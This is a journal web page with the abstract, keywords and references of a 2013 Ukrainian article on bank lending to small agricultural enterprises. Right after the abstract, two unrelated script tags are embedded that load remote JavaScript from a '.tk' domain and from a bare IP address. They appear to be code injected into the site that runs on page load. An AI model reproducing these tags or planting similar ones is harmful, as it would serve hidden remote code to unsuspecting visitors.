ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 334.012.61-336.77
Сторінка молодого науковця

Банківське кредитування малих аграрних підприємств / Півторак В. С. // Економіка АПК. - 2013. - № 5 - С. 130

Визначено місце і роль позикових коштів у формуванні капіталу малих аграрних підприємств та доведено їхню важливість для розвитку відповідних господарюючих суб’єктів і поліпшення стану їх фінансового забезпечення в сучасних ринкових умовах. Висвітлено результати порівняльного аналізу процентних ставок по кредитах в Україні та в зарубіжних країнах, а також для малих і великих вітчизняних підприємств окремо. Наведено частку наданих кредитів комерційними банками малим підприємствам у загальному обсязі їх кредитного портфеля та визначено основні причини небажання фінансово-кредитних установ надавати позики суб’єктам відповідної сфери. Подано результати опитування власників малих підприємств щодо жорсткості умов одержання кредитних ресурсів, визначено основні проблеми кредитування малих аграрних підприємств та запропоновано ряд практичних рекомендацій щодо їх розв’язання. Табл.: 2. Рис.: 2. Бібліогр.: 11.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: інститут кредитування, мале підприємництво, позиковий капітал, застава, процент-на ставка, комерційний банк, кредитна політика

Список використаних джерел

 1. Біломістний О.М. Особливості кредитування діяльності малих підприємств на сучасному етапі розвитку економіки України / О.М. Біломістний // Вісн. ун-ту банківської справи Національного банку України. – 2010. – №1. – С. 90-93.
 2. Воробйова О.І. Фінансове забезпечення інвестиційної діяльності суб’єктів малого підприємництва / О.І. Воробйова // Экономика и управление. – 2011. – №5. – С. 18-24.
 3. Ділові очікування підприємств України. Аналітичний звіт [Електронний ресурс]. К., 2012. – 38 c. – Режим доступу: http://www.bank.gov.ua.
 4. Дрига С.Г. Мале підприємництво України: становлення, механізми управління та підтримки: моногр. / С.Г. Дрига – К.: Вид-во «Либідь», 2009. – 442 с.
 5. Кривоног О.Л. Банківське кредитування малих підприємств / О.Л. Кривоног // Фінанси України. – 2005. - №8. – С. 101-105.
 6. Лазур П.Ю. Банківський кредит як чинник розвитку підприємництва в Україні / П.Ю. Лазур // Наук. вісн. НЛТУ України. – 2012. – Вип. 22.5. – С. 246-250.
 7. Нескородєва І.І. Особливості кредитування малого бізнесу в Україні / І.І. Нескородєва, А.М. Биковська // Вісн. економіки транспорту і промисловості. – 2011. - №3. – С. 125-130.
 8. Панова Г.С. Кредитна політика комерційного банку / Г.С. Панова – М.: ІКЦ «ДІС», 2007. – 352 с.
 9. Шубенко І.А. Сутність кредитного страхування та його роль при кредитуванні сільськогосподарських підприємств [Електронний ресурс] / І.А. Шубенко // 2009. – Режим доступу: http://www.nbuv.gov.ua.
 10. Яворська Т.І. Малий бізнес у сільському господарстві: теорія і практика: моногр. / Т.І. Яворська. – К.: ННЦ ІАЕ, 2012. – 386 с.
 11. Shane Scott. To Boost Small Business Credit, Think Small (Banks) [Електронний ресурс] / S. Shane // 2012. - Режим доступу: http://www.businessweek.com.
Читати статтю: 13_05_21.pdf